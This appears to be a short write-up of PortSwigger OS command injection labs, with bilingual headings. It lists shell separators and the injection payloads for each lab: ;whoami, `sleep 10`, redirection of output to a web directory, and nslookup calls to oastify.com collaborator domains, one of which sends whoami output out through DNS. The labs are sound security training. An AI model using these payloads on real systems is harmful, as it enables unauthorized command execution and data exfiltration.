OS Command Injection - PortSwigger

Identification

 &&
 &
 ||
 |
 ;
 `
 '
 "
 0x0a
 \n

Inyección de comandos, caso simple || OS command injection, simple case

By corrupting the query, we see that we are within the context of command execution.

We concatenate our command using a ;. The underlying command would look like this:

sh -c bash /home/peter-GPnOhF/stockreport.sh 1 1;whoami
  • Injection
;whoami

Inyección ciega con retrasos temporales || Blind OS command injection with time delays

By using backticks, we execute a command to check if it is vulnerable.

  • Injection
`sleep 10`

Inyección ciega con redirección de salida || Blind OS command injection with output redirection

First, we detect command injection using a sleep.

We send the output to a file inside the images directory /var/www/images/.

  • Injection
`whoami` >> /var/www/images/test.txt

Inyección ciega con interacción OOB || Blind OS command injection with out-of-band interaction

In this case, we cannot force a delay in the response; however, we can detect the vulnerability via a DNS request.

  • Injection
`nslookup 6ahsp7n9bzragcunrr7b18q6gxmpafy4.oastify.com`

Inyección ciega con exfiltración vía interacción OOB || Blind OS command injection with out-of-band data exfiltration

Just like the previous lab, we detect the vulnerability through a DNS request.

By using the $() operator in Bash, we make a request to our domain using the output of the whoami command as a subdomain.

  • Injección
`nslookup $(whoami).c5iykdif65mgbiptmx2hwelcb3hw5mtb.oastify.com`